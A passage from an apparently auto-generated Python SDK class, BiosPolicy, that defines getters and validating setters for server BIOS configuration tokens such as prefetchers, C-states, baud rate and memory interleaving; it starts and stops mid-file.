:return: The mod_time of this BiosPolicy.
:rtype: datetime
"""
return self._mod_time
@mod_time.setter
def mod_time(self, mod_time):
"""
Sets the mod_time of this BiosPolicy.
The time when this managed object was last modified.
:param mod_time: The mod_time of this BiosPolicy.
:type: datetime
"""
self._mod_time = mod_time
@property
def moid(self):
"""
Gets the moid of this BiosPolicy.
A unique identifier of this Managed Object instance.
:return: The moid of this BiosPolicy.
:rtype: str
"""
return self._moid
@moid.setter
def moid(self, moid):
"""
Sets the moid of this BiosPolicy.
A unique identifier of this Managed Object instance.
:param moid: The moid of this BiosPolicy.
:type: str
"""
self._moid = moid
@property
def object_type(self):
"""
Gets the object_type of this BiosPolicy.
The fully-qualified type of this managed object, e.g. the class name.
:return: The object_type of this BiosPolicy.
:rtype: str
"""
return self._object_type
@object_type.setter
def object_type(self, object_type):
"""
Sets the object_type of this BiosPolicy.
The fully-qualified type of this managed object, e.g. the class name.
:param object_type: The object_type of this BiosPolicy.
:type: str
"""
self._object_type = object_type
@property
def owners(self):
"""
Gets the owners of this BiosPolicy.
An array of owners which represent effective ownership of this object.
:return: The owners of this BiosPolicy.
:rtype: list[str]
"""
return self._owners
@owners.setter
def owners(self, owners):
"""
Sets the owners of this BiosPolicy.
An array of owners which represent effective ownership of this object.
:param owners: The owners of this BiosPolicy.
:type: list[str]
"""
self._owners = owners
@property
def parent(self):
"""
Gets the parent of this BiosPolicy.
The direct ancestor of this managed object in the containment hierarchy.
:return: The parent of this BiosPolicy.
:rtype: MoBaseMoRef
"""
return self._parent
@parent.setter
def parent(self, parent):
"""
Sets the parent of this BiosPolicy.
The direct ancestor of this managed object in the containment hierarchy.
:param parent: The parent of this BiosPolicy.
:type: MoBaseMoRef
"""
self._parent = parent
@property
def tags(self):
"""
Gets the tags of this BiosPolicy.
An array of tags, which allow key/value meta-data to be added to managed objects.
:return: The tags of this BiosPolicy.
:rtype: list[MoTag]
"""
return self._tags
@tags.setter
def tags(self, tags):
"""
Sets the tags of this BiosPolicy.
An array of tags, which allow key/value meta-data to be added to managed objects.
:param tags: The tags of this BiosPolicy.
:type: list[MoTag]
"""
self._tags = tags
@property
def version_context(self):
"""
Gets the version_context of this BiosPolicy.
The versioning info for this managed object.
:return: The version_context of this BiosPolicy.
:rtype: MoVersionContext
"""
return self._version_context
@version_context.setter
def version_context(self, version_context):
"""
Sets the version_context of this BiosPolicy.
The versioning info for this managed object.
:param version_context: The version_context of this BiosPolicy.
:type: MoVersionContext
"""
self._version_context = version_context
@property
def description(self):
"""
Gets the description of this BiosPolicy.
Description of the policy.
:return: The description of this BiosPolicy.
:rtype: str
"""
return self._description
@description.setter
def description(self, description):
"""
Sets the description of this BiosPolicy.
Description of the policy.
:param description: The description of this BiosPolicy.
:type: str
"""
self._description = description
@property
def name(self):
"""
Gets the name of this BiosPolicy.
Name of the policy.
:return: The name of this BiosPolicy.
:rtype: str
"""
return self._name
@name.setter
def name(self, name):
"""
Sets the name of this BiosPolicy.
Name of the policy.
:param name: The name of this BiosPolicy.
:type: str
"""
self._name = name
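# BIOS token accessors begin here; each setter rejects any value outside
# its allowed_values list by raising ValueError.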
@property
def adjacent_cache_line_prefetch(self):
"""
Gets the adjacent_cache_line_prefetch of this BiosPolicy.
BIOS Token for setting Adjacent Cache Line Prefetcher configuration
:return: The adjacent_cache_line_prefetch of this BiosPolicy.
:rtype: str
"""
return self._adjacent_cache_line_prefetch
@adjacent_cache_line_prefetch.setter
def adjacent_cache_line_prefetch(self, adjacent_cache_line_prefetch):
"""
Sets the adjacent_cache_line_prefetch of this BiosPolicy.
BIOS Token for setting Adjacent Cache Line Prefetcher configuration
:param adjacent_cache_line_prefetch: The adjacent_cache_line_prefetch of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if adjacent_cache_line_prefetch not in allowed_values:
raise ValueError(
"Invalid value for `adjacent_cache_line_prefetch` ({0}), must be one of {1}"
.format(adjacent_cache_line_prefetch, allowed_values)
)
self._adjacent_cache_line_prefetch = adjacent_cache_line_prefetch
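# Illustrative usage (a sketch, not part of the generated file): token
# validation fires at assignment time, not at API submission time.
#
#   policy = BiosPolicy(name='example',
#                       adjacent_cache_line_prefetch='enabled')
#   policy.altitude = 'auto'     # accepted: listed in allowed_values
#   policy.altitude = '5000-m'   # raises ValueError: not an allowed value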
@property
def all_usb_devices(self):
"""
Gets the all_usb_devices of this BiosPolicy.
BIOS Token for setting All USB Devices configuration
:return: The all_usb_devices of this BiosPolicy.
:rtype: str
"""
return self._all_usb_devices
@all_usb_devices.setter
def all_usb_devices(self, all_usb_devices):
"""
Sets the all_usb_devices of this BiosPolicy.
BIOS Token for setting All USB Devices configuration
:param all_usb_devices: The all_usb_devices of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if all_usb_devices not in allowed_values:
raise ValueError(
"Invalid value for `all_usb_devices` ({0}), must be one of {1}"
.format(all_usb_devices, allowed_values)
)
self._all_usb_devices = all_usb_devices
@property
def altitude(self):
"""
Gets the altitude of this BiosPolicy.
BIOS Token for setting Altitude configuration
:return: The altitude of this BiosPolicy.
:rtype: str
"""
return self._altitude
@altitude.setter
def altitude(self, altitude):
"""
Sets the altitude of this BiosPolicy.
BIOS Token for setting Altitude configuration
:param altitude: The altitude of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "1500-m", "300-m", "3000-m", "900-m", "auto"]
if altitude not in allowed_values:
raise ValueError(
"Invalid value for `altitude` ({0}), must be one of {1}"
.format(altitude, allowed_values)
)
self._altitude = altitude
@property
def aspm_support(self):
"""
Gets the aspm_support of this BiosPolicy.
BIOS Token for setting ASPM Support configuration
:return: The aspm_support of this BiosPolicy.
:rtype: str
"""
return self._aspm_support
@aspm_support.setter
def aspm_support(self, aspm_support):
"""
Sets the aspm_support of this BiosPolicy.
BIOS Token for setting ASPM Support configuration
:param aspm_support: The aspm_support of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "Auto", "Disabled", "Force L0s", "L1 Only"]
if aspm_support not in allowed_values:
raise ValueError(
"Invalid value for `aspm_support` ({0}), must be one of {1}"
.format(aspm_support, allowed_values)
)
self._aspm_support = aspm_support
@property
def assert_nmi_on_perr(self):
"""
Gets the assert_nmi_on_perr of this BiosPolicy.
BIOS Token for setting Assert NMI on PERR configuration
:return: The assert_nmi_on_perr of this BiosPolicy.
:rtype: str
"""
return self._assert_nmi_on_perr
@assert_nmi_on_perr.setter
def assert_nmi_on_perr(self, assert_nmi_on_perr):
"""
Sets the assert_nmi_on_perr of this BiosPolicy.
BIOS Token for setting Assert NMI on PERR configuration
:param assert_nmi_on_perr: The assert_nmi_on_perr of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if assert_nmi_on_perr not in allowed_values:
raise ValueError(
"Invalid value for `assert_nmi_on_perr` ({0}), must be one of {1}"
.format(assert_nmi_on_perr, allowed_values)
)
self._assert_nmi_on_perr = assert_nmi_on_perr
@property
def assert_nmi_on_serr(self):
"""
Gets the assert_nmi_on_serr of this BiosPolicy.
BIOS Token for setting Assert NMI on SERR configuration
:return: The assert_nmi_on_serr of this BiosPolicy.
:rtype: str
"""
return self._assert_nmi_on_serr
@assert_nmi_on_serr.setter
def assert_nmi_on_serr(self, assert_nmi_on_serr):
"""
Sets the assert_nmi_on_serr of this BiosPolicy.
BIOS Token for setting Assert NMI on SERR configuration
:param assert_nmi_on_serr: The assert_nmi_on_serr of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if assert_nmi_on_serr not in allowed_values:
raise ValueError(
"Invalid value for `assert_nmi_on_serr` ({0}), must be one of {1}"
.format(assert_nmi_on_serr, allowed_values)
)
self._assert_nmi_on_serr = assert_nmi_on_serr
@property
def auto_cc_state(self):
"""
Gets the auto_cc_state of this BiosPolicy.
BIOS Token for setting Autonomous Core C-state configuration
:return: The auto_cc_state of this BiosPolicy.
:rtype: str
"""
return self._auto_cc_state
@auto_cc_state.setter
def auto_cc_state(self, auto_cc_state):
"""
Sets the auto_cc_state of this BiosPolicy.
BIOS Token for setting Autonomous Core C-state configuration
:param auto_cc_state: The auto_cc_state of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if auto_cc_state not in allowed_values:
raise ValueError(
"Invalid value for `auto_cc_state` ({0}), must be one of {1}"
.format(auto_cc_state, allowed_values)
)
self._auto_cc_state = auto_cc_state
@property
def autonumous_cstate_enable(self):
"""
Gets the autonumous_cstate_enable of this BiosPolicy.
BIOS Token for setting CPU Autonomous Cstate configuration
:return: The autonumous_cstate_enable of this BiosPolicy.
:rtype: str
"""
return self._autonumous_cstate_enable
@autonumous_cstate_enable.setter
def autonumous_cstate_enable(self, autonumous_cstate_enable):
"""
Sets the autonumous_cstate_enable of this BiosPolicy.
BIOS Token for setting CPU Autonomous Cstate configuration
:param autonumous_cstate_enable: The autonumous_cstate_enable of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if autonumous_cstate_enable not in allowed_values:
raise ValueError(
"Invalid value for `autonumous_cstate_enable` ({0}), must be one of {1}"
.format(autonumous_cstate_enable, allowed_values)
)
self._autonumous_cstate_enable = autonumous_cstate_enable
@property
def baud_rate(self):
"""
Gets the baud_rate of this BiosPolicy.
BIOS Token for setting Baud rate configuration
:return: The baud_rate of this BiosPolicy.
:rtype: str
"""
return self._baud_rate
@baud_rate.setter
def baud_rate(self, baud_rate):
"""
Sets the baud_rate of this BiosPolicy.
BIOS Token for setting Baud rate configuration
:param baud_rate: The baud_rate of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "115200", "19200", "38400", "57600", "9600"]
if baud_rate not in allowed_values:
raise ValueError(
"Invalid value for `baud_rate` ({0}), must be one of {1}"
.format(baud_rate, allowed_values)
)
self._baud_rate = baud_rate
@property
def bme_dma_mitigation(self):
"""
Gets the bme_dma_mitigation of this BiosPolicy.
BIOS Token for setting BME DMA Mitigation configuration
:return: The bme_dma_mitigation of this BiosPolicy.
:rtype: str
"""
return self._bme_dma_mitigation
@bme_dma_mitigation.setter
def bme_dma_mitigation(self, bme_dma_mitigation):
"""
Sets the bme_dma_mitigation of this BiosPolicy.
BIOS Token for setting BME DMA Mitigation configuration
:param bme_dma_mitigation: The bme_dma_mitigation of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if bme_dma_mitigation not in allowed_values:
raise ValueError(
"Invalid value for `bme_dma_mitigation` ({0}), must be one of {1}"
.format(bme_dma_mitigation, allowed_values)
)
self._bme_dma_mitigation = bme_dma_mitigation
@property
def boot_option_num_retry(self):
"""
Gets the boot_option_num_retry of this BiosPolicy.
BIOS Token for setting Number of Retries configuration
:return: The boot_option_num_retry of this BiosPolicy.
:rtype: str
"""
return self._boot_option_num_retry
@boot_option_num_retry.setter
def boot_option_num_retry(self, boot_option_num_retry):
"""
Sets the boot_option_num_retry of this BiosPolicy.
BIOS Token for setting Number of Retries configuration
:param boot_option_num_retry: The boot_option_num_retry of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "13", "5", "Infinite"]
if boot_option_num_retry not in allowed_values:
raise ValueError(
"Invalid value for `boot_option_num_retry` ({0}), must be one of {1}"
.format(boot_option_num_retry, allowed_values)
)
self._boot_option_num_retry = boot_option_num_retry
@property
def boot_option_re_cool_down(self):
"""
Gets the boot_option_re_cool_down of this BiosPolicy.
BIOS Token for setting Cool Down Time (sec) configuration
:return: The boot_option_re_cool_down of this BiosPolicy.
:rtype: str
"""
return self._boot_option_re_cool_down
@boot_option_re_cool_down.setter
def boot_option_re_cool_down(self, boot_option_re_cool_down):
"""
Sets the boot_option_re_cool_down of this BiosPolicy.
BIOS Token for setting Cool Down Time (sec) configuration
:param boot_option_re_cool_down: The boot_option_re_cool_down of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "15", "45", "90"]
if boot_option_re_cool_down not in allowed_values:
raise ValueError(
"Invalid value for `boot_option_re_cool_down` ({0}), must be one of {1}"
.format(boot_option_re_cool_down, allowed_values)
)
self._boot_option_re_cool_down = boot_option_re_cool_down
@property
def boot_option_retry(self):
"""
Gets the boot_option_retry of this BiosPolicy.
BIOS Token for setting Boot option retry configuration
:return: The boot_option_retry of this BiosPolicy.
:rtype: str
"""
return self._boot_option_retry
@boot_option_retry.setter
def boot_option_retry(self, boot_option_retry):
"""
Sets the boot_option_retry of this BiosPolicy.
BIOS Token for setting Boot option retry configuration
:param boot_option_retry: The boot_option_retry of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if boot_option_retry not in allowed_values:
raise ValueError(
"Invalid value for `boot_option_retry` ({0}), must be one of {1}"
.format(boot_option_retry, allowed_values)
)
self._boot_option_retry = boot_option_retry
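    # Illustrative sketch: the three boot-retry tokens above are commonly set
    # together. The values are taken from each setter's allowed_values;
    # pairing them like this reflects typical intent, not a documented
    # requirement.
    #
    #     policy.boot_option_retry = "enabled"    # turn boot retries on
    #     policy.boot_option_num_retry = "5"      # retry up to five times
    #     policy.boot_option_re_cool_down = "45"  # wait 45 s between attempts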
@property
def boot_performance_mode(self):
"""
Gets the boot_performance_mode of this BiosPolicy.
BIOS Token for setting Boot Performance Mode configuration
:return: The boot_performance_mode of this BiosPolicy.
:rtype: str
"""
return self._boot_performance_mode
@boot_performance_mode.setter
def boot_performance_mode(self, boot_performance_mode):
"""
Sets the boot_performance_mode of this BiosPolicy.
BIOS Token for setting Boot Performance Mode configuration
:param boot_performance_mode: The boot_performance_mode of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "Max Efficient", "Max Performance", "Set by Intel NM"]
if boot_performance_mode not in allowed_values:
raise ValueError(
"Invalid value for `boot_performance_mode` ({0}), must be one of {1}"
.format(boot_performance_mode, allowed_values)
)
self._boot_performance_mode = boot_performance_mode
@property
def cbs_cmn_cpu_cpb(self):
"""
Gets the cbs_cmn_cpu_cpb of this BiosPolicy.
BIOS Token for setting Core Performance Boost configuration
:return: The cbs_cmn_cpu_cpb of this BiosPolicy.
:rtype: str
"""
return self._cbs_cmn_cpu_cpb
@cbs_cmn_cpu_cpb.setter
def cbs_cmn_cpu_cpb(self, cbs_cmn_cpu_cpb):
"""
Sets the cbs_cmn_cpu_cpb of this BiosPolicy.
BIOS Token for setting Core Performance Boost configuration
:param cbs_cmn_cpu_cpb: The cbs_cmn_cpu_cpb of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "Auto", "disabled"]
if cbs_cmn_cpu_cpb not in allowed_values:
raise ValueError(
"Invalid value for `cbs_cmn_cpu_cpb` ({0}), must be one of {1}"
.format(cbs_cmn_cpu_cpb, allowed_values)
)
self._cbs_cmn_cpu_cpb = cbs_cmn_cpu_cpb
@property
def cbs_cmn_cpu_gen_downcore_ctrl(self):
"""
Gets the cbs_cmn_cpu_gen_downcore_ctrl of this BiosPolicy.
BIOS Token for setting Downcore control configuration
:return: The cbs_cmn_cpu_gen_downcore_ctrl of this BiosPolicy.
:rtype: str
"""
return self._cbs_cmn_cpu_gen_downcore_ctrl
@cbs_cmn_cpu_gen_downcore_ctrl.setter
def cbs_cmn_cpu_gen_downcore_ctrl(self, cbs_cmn_cpu_gen_downcore_ctrl):
"""
Sets the cbs_cmn_cpu_gen_downcore_ctrl of this BiosPolicy.
BIOS Token for setting Downcore control configuration
:param cbs_cmn_cpu_gen_downcore_ctrl: The cbs_cmn_cpu_gen_downcore_ctrl of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "Auto", "FOUR (2 + 2)", "FOUR (4 + 0)", "SIX (3 + 3)", "THREE (3 + 0)", "TWO (1 + 1)", "TWO (2 + 0)"]
if cbs_cmn_cpu_gen_downcore_ctrl not in allowed_values:
raise ValueError(
"Invalid value for `cbs_cmn_cpu_gen_downcore_ctrl` ({0}), must be one of {1}"
.format(cbs_cmn_cpu_gen_downcore_ctrl, allowed_values)
)
self._cbs_cmn_cpu_gen_downcore_ctrl = cbs_cmn_cpu_gen_downcore_ctrl
@property
def cbs_cmn_cpu_global_cstate_ctrl(self):
"""
Gets the cbs_cmn_cpu_global_cstate_ctrl of this BiosPolicy.
BIOS Token for setting Global C-state Control configuration
:return: The cbs_cmn_cpu_global_cstate_ctrl of this BiosPolicy.
:rtype: str
"""
return self._cbs_cmn_cpu_global_cstate_ctrl
@cbs_cmn_cpu_global_cstate_ctrl.setter
def cbs_cmn_cpu_global_cstate_ctrl(self, cbs_cmn_cpu_global_cstate_ctrl):
"""
Sets the cbs_cmn_cpu_global_cstate_ctrl of this BiosPolicy.
BIOS Token for setting Global C-state Control configuration
:param cbs_cmn_cpu_global_cstate_ctrl: The cbs_cmn_cpu_global_cstate_ctrl of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "Auto", "disabled", "enabled"]
if cbs_cmn_cpu_global_cstate_ctrl not in allowed_values:
raise ValueError(
"Invalid value for `cbs_cmn_cpu_global_cstate_ctrl` ({0}), must be one of {1}"
.format(cbs_cmn_cpu_global_cstate_ctrl, allowed_values)
)
self._cbs_cmn_cpu_global_cstate_ctrl = cbs_cmn_cpu_global_cstate_ctrl
@property
def cbs_cmn_cpu_l1stream_hw_prefetcher(self):
"""
Gets the cbs_cmn_cpu_l1stream_hw_prefetcher of this BiosPolicy.
BIOS Token for setting L1 Stream HW Prefetcher configuration
:return: The cbs_cmn_cpu_l1stream_hw_prefetcher of this BiosPolicy.
:rtype: str
"""
return self._cbs_cmn_cpu_l1stream_hw_prefetcher
@cbs_cmn_cpu_l1stream_hw_prefetcher.setter
def cbs_cmn_cpu_l1stream_hw_prefetcher(self, cbs_cmn_cpu_l1stream_hw_prefetcher):
"""
Sets the cbs_cmn_cpu_l1stream_hw_prefetcher of this BiosPolicy.
BIOS Token for setting L1 Stream HW Prefetcher configuration
:param cbs_cmn_cpu_l1stream_hw_prefetcher: The cbs_cmn_cpu_l1stream_hw_prefetcher of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "Auto", "disabled", "enabled"]
if cbs_cmn_cpu_l1stream_hw_prefetcher not in allowed_values:
raise ValueError(
"Invalid value for `cbs_cmn_cpu_l1stream_hw_prefetcher` ({0}), must be one of {1}"
.format(cbs_cmn_cpu_l1stream_hw_prefetcher, allowed_values)
)
self._cbs_cmn_cpu_l1stream_hw_prefetcher = cbs_cmn_cpu_l1stream_hw_prefetcher
@property
def cbs_cmn_cpu_l2stream_hw_prefetcher(self):
"""
Gets the cbs_cmn_cpu_l2stream_hw_prefetcher of this BiosPolicy.
BIOS Token for setting L2 Stream HW Prefetcher configuration
:return: The cbs_cmn_cpu_l2stream_hw_prefetcher of this BiosPolicy.
:rtype: str
"""
return self._cbs_cmn_cpu_l2stream_hw_prefetcher
@cbs_cmn_cpu_l2stream_hw_prefetcher.setter
def cbs_cmn_cpu_l2stream_hw_prefetcher(self, cbs_cmn_cpu_l2stream_hw_prefetcher):
"""
Sets the cbs_cmn_cpu_l2stream_hw_prefetcher of this BiosPolicy.
BIOS Token for setting L2 Stream HW Prefetcher configuration
:param cbs_cmn_cpu_l2stream_hw_prefetcher: The cbs_cmn_cpu_l2stream_hw_prefetcher of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "Auto", "disabled", "enabled"]
if cbs_cmn_cpu_l2stream_hw_prefetcher not in allowed_values:
raise ValueError(
"Invalid value for `cbs_cmn_cpu_l2stream_hw_prefetcher` ({0}), must be one of {1}"
.format(cbs_cmn_cpu_l2stream_hw_prefetcher, allowed_values)
)
self._cbs_cmn_cpu_l2stream_hw_prefetcher = cbs_cmn_cpu_l2stream_hw_prefetcher
@property
def cbs_cmn_determinism_slider(self):
"""
Gets the cbs_cmn_determinism_slider of this BiosPolicy.
BIOS Token for setting Determinism Slider configuration
:return: The cbs_cmn_determinism_slider of this BiosPolicy.
:rtype: str
"""
return self._cbs_cmn_determinism_slider
@cbs_cmn_determinism_slider.setter
def cbs_cmn_determinism_slider(self, cbs_cmn_determinism_slider):
"""
Sets the cbs_cmn_determinism_slider of this BiosPolicy.
BIOS Token for setting Determinism Slider configuration
:param cbs_cmn_determinism_slider: The cbs_cmn_determinism_slider of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "Auto", "Performance", "Power"]
if cbs_cmn_determinism_slider not in allowed_values:
raise ValueError(
"Invalid value for `cbs_cmn_determinism_slider` ({0}), must be one of {1}"
.format(cbs_cmn_determinism_slider, allowed_values)
)
self._cbs_cmn_determinism_slider = cbs_cmn_determinism_slider
@property
def cbs_cmn_gnb_nb_iommu(self):
"""
Gets the cbs_cmn_gnb_nb_iommu of this BiosPolicy.
BIOS Token for setting IOMMU configuration
:return: The cbs_cmn_gnb_nb_iommu of this BiosPolicy.
:rtype: str
"""
return self._cbs_cmn_gnb_nb_iommu
@cbs_cmn_gnb_nb_iommu.setter
def cbs_cmn_gnb_nb_iommu(self, cbs_cmn_gnb_nb_iommu):
"""
Sets the cbs_cmn_gnb_nb_iommu of this BiosPolicy.
BIOS Token for setting IOMMU configuration
:param cbs_cmn_gnb_nb_iommu: The cbs_cmn_gnb_nb_iommu of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "Auto", "disabled", "enabled"]
if cbs_cmn_gnb_nb_iommu not in allowed_values:
raise ValueError(
"Invalid value for `cbs_cmn_gnb_nb_iommu` ({0}), must be one of {1}"
.format(cbs_cmn_gnb_nb_iommu, allowed_values)
)
self._cbs_cmn_gnb_nb_iommu = cbs_cmn_gnb_nb_iommu
@property
def cbs_cmn_mem_ctrl_bank_group_swap_ddr4(self):
"""
Gets the cbs_cmn_mem_ctrl_bank_group_swap_ddr4 of this BiosPolicy.
BIOS Token for setting Bank Group Swap configuration
:return: The cbs_cmn_mem_ctrl_bank_group_swap_ddr4 of this BiosPolicy.
:rtype: str
"""
return self._cbs_cmn_mem_ctrl_bank_group_swap_ddr4
@cbs_cmn_mem_ctrl_bank_group_swap_ddr4.setter
def cbs_cmn_mem_ctrl_bank_group_swap_ddr4(self, cbs_cmn_mem_ctrl_bank_group_swap_ddr4):
"""
Sets the cbs_cmn_mem_ctrl_bank_group_swap_ddr4 of this BiosPolicy.
BIOS Token for setting Bank Group Swap configuration
:param cbs_cmn_mem_ctrl_bank_group_swap_ddr4: The cbs_cmn_mem_ctrl_bank_group_swap_ddr4 of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "Auto", "disabled", "enabled"]
if cbs_cmn_mem_ctrl_bank_group_swap_ddr4 not in allowed_values:
raise ValueError(
"Invalid value for `cbs_cmn_mem_ctrl_bank_group_swap_ddr4` ({0}), must be one of {1}"
.format(cbs_cmn_mem_ctrl_bank_group_swap_ddr4, allowed_values)
)
self._cbs_cmn_mem_ctrl_bank_group_swap_ddr4 = cbs_cmn_mem_ctrl_bank_group_swap_ddr4
@property
def cbs_cmn_mem_map_bank_interleave_ddr4(self):
"""
Gets the cbs_cmn_mem_map_bank_interleave_ddr4 of this BiosPolicy.
BIOS Token for setting Chipselect Interleaving configuration
:return: The cbs_cmn_mem_map_bank_interleave_ddr4 of this BiosPolicy.
:rtype: str
"""
return self._cbs_cmn_mem_map_bank_interleave_ddr4
@cbs_cmn_mem_map_bank_interleave_ddr4.setter
def cbs_cmn_mem_map_bank_interleave_ddr4(self, cbs_cmn_mem_map_bank_interleave_ddr4):
"""
Sets the cbs_cmn_mem_map_bank_interleave_ddr4 of this BiosPolicy.
BIOS Token for setting Chipselect Interleaving configuration
:param cbs_cmn_mem_map_bank_interleave_ddr4: The cbs_cmn_mem_map_bank_interleave_ddr4 of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "Auto", "disabled"]
if cbs_cmn_mem_map_bank_interleave_ddr4 not in allowed_values:
raise ValueError(
"Invalid value for `cbs_cmn_mem_map_bank_interleave_ddr4` ({0}), must be one of {1}"
.format(cbs_cmn_mem_map_bank_interleave_ddr4, allowed_values)
)
self._cbs_cmn_mem_map_bank_interleave_ddr4 = cbs_cmn_mem_map_bank_interleave_ddr4
@property
def cbs_cmnc_tdp_ctl(self):
"""
Gets the cbs_cmnc_tdp_ctl of this BiosPolicy.
BIOS Token for setting cTDP Control configuration
:return: The cbs_cmnc_tdp_ctl of this BiosPolicy.
:rtype: str
"""
return self._cbs_cmnc_tdp_ctl
@cbs_cmnc_tdp_ctl.setter
def cbs_cmnc_tdp_ctl(self, cbs_cmnc_tdp_ctl):
"""
Sets the cbs_cmnc_tdp_ctl of this BiosPolicy.
BIOS Token for setting cTDP Control configuration
:param cbs_cmnc_tdp_ctl: The cbs_cmnc_tdp_ctl of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "Auto", "Manual"]
if cbs_cmnc_tdp_ctl not in allowed_values:
raise ValueError(
"Invalid value for `cbs_cmnc_tdp_ctl` ({0}), must be one of {1}"
.format(cbs_cmnc_tdp_ctl, allowed_values)
)
self._cbs_cmnc_tdp_ctl = cbs_cmnc_tdp_ctl
@property
def cbs_df_cmn_mem_intlv(self):
"""
Gets the cbs_df_cmn_mem_intlv of this BiosPolicy.
BIOS Token for setting Memory interleaving configuration
:return: The cbs_df_cmn_mem_intlv of this BiosPolicy.
:rtype: str
"""
return self._cbs_df_cmn_mem_intlv
@cbs_df_cmn_mem_intlv.setter
def cbs_df_cmn_mem_intlv(self, cbs_df_cmn_mem_intlv):
"""
Sets the cbs_df_cmn_mem_intlv of this BiosPolicy.
BIOS Token for setting Memory interleaving configuration
:param cbs_df_cmn_mem_intlv: The cbs_df_cmn_mem_intlv of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "Auto", "Channel", "Die", "None", "Socket"]
if cbs_df_cmn_mem_intlv not in allowed_values:
raise ValueError(
"Invalid value for `cbs_df_cmn_mem_intlv` ({0}), must be one of {1}"
.format(cbs_df_cmn_mem_intlv, allowed_values)
)
self._cbs_df_cmn_mem_intlv = cbs_df_cmn_mem_intlv
@property
def cbs_df_cmn_mem_intlv_size(self):
"""
Gets the cbs_df_cmn_mem_intlv_size of this BiosPolicy.
BIOS Token for setting Memory interleaving size configuration
:return: The cbs_df_cmn_mem_intlv_size of this BiosPolicy.
:rtype: str
"""
return self._cbs_df_cmn_mem_intlv_size
@cbs_df_cmn_mem_intlv_size.setter
def cbs_df_cmn_mem_intlv_size(self, cbs_df_cmn_mem_intlv_size):
"""
Sets the cbs_df_cmn_mem_intlv_size of this BiosPolicy.
BIOS Token for setting Memory interleaving size configuration
:param cbs_df_cmn_mem_intlv_size: The cbs_df_cmn_mem_intlv_size of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "1 KB", "2 KB", "256 Bytes", "512 Bytes", "Auto"]
if cbs_df_cmn_mem_intlv_size not in allowed_values:
raise ValueError(
"Invalid value for `cbs_df_cmn_mem_intlv_size` ({0}), must be one of {1}"
.format(cbs_df_cmn_mem_intlv_size, allowed_values)
)
self._cbs_df_cmn_mem_intlv_size = cbs_df_cmn_mem_intlv_size
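    # Illustrative sketch for the AMD data-fabric tokens above: selecting a
    # channel-interleave layout with an explicit granularity. Whether a given
    # platform honours a particular combination is platform-dependent; these
    # are simply values each setter accepts.
    #
    #     policy.cbs_df_cmn_mem_intlv = "Channel"    # interleave across channels
    #     policy.cbs_df_cmn_mem_intlv_size = "2 KB"  # 2 KB interleave granularity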
@property
def cdn_enable(self):
"""
Gets the cdn_enable of this BiosPolicy.
BIOS Token for setting Consistent Device Naming configuration
:return: The cdn_enable of this BiosPolicy.
:rtype: str
"""
return self._cdn_enable
@cdn_enable.setter
def cdn_enable(self, cdn_enable):
"""
Sets the cdn_enable of this BiosPolicy.
BIOS Token for setting Consistent Device Naming configuration
:param cdn_enable: The cdn_enable of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if cdn_enable not in allowed_values:
raise ValueError(
"Invalid value for `cdn_enable` ({0}), must be one of {1}"
.format(cdn_enable, allowed_values)
)
self._cdn_enable = cdn_enable
@property
def cdn_support(self):
"""
Gets the cdn_support of this BiosPolicy.
BIOS Token for setting CDN Support for LOM configuration
:return: The cdn_support of this BiosPolicy.
:rtype: str
"""
return self._cdn_support
@cdn_support.setter
def cdn_support(self, cdn_support):
"""
Sets the cdn_support of this BiosPolicy.
BIOS Token for setting CDN Support for LOM configuration
:param cdn_support: The cdn_support of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "disabled", "enabled", "LOMs Only"]
if cdn_support not in allowed_values:
raise ValueError(
"Invalid value for `cdn_support` ({0}), must be one of {1}"
.format(cdn_support, allowed_values)
)
self._cdn_support = cdn_support
@property
def channel_inter_leave(self):
"""
Gets the channel_inter_leave of this BiosPolicy.
BIOS Token for setting Channel Interleaving configuration
:return: The channel_inter_leave of this BiosPolicy.
:rtype: str
"""
return self._channel_inter_leave
@channel_inter_leave.setter
def channel_inter_leave(self, channel_inter_leave):
"""
Sets the channel_inter_leave of this BiosPolicy.
BIOS Token for setting Channel Interleaving configuration
:param channel_inter_leave: The channel_inter_leave of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "1-way", "2-way", "3-way", "4-way", "auto"]
if channel_inter_leave not in allowed_values:
raise ValueError(
"Invalid value for `channel_inter_leave` ({0}), must be one of {1}"
.format(channel_inter_leave, allowed_values)
)
self._channel_inter_leave = channel_inter_leave
@property
def cke_low_policy(self):
"""
Gets the cke_low_policy of this BiosPolicy.
BIOS Token for setting CKE Low Policy configuration
:return: The cke_low_policy of this BiosPolicy.
:rtype: str
"""
return self._cke_low_policy
@cke_low_policy.setter
def cke_low_policy(self, cke_low_policy):
"""
Sets the cke_low_policy of this BiosPolicy.
BIOS Token for setting CKE Low Policy configuration
:param cke_low_policy: The cke_low_policy of this BiosPolicy.
:type: str
"""
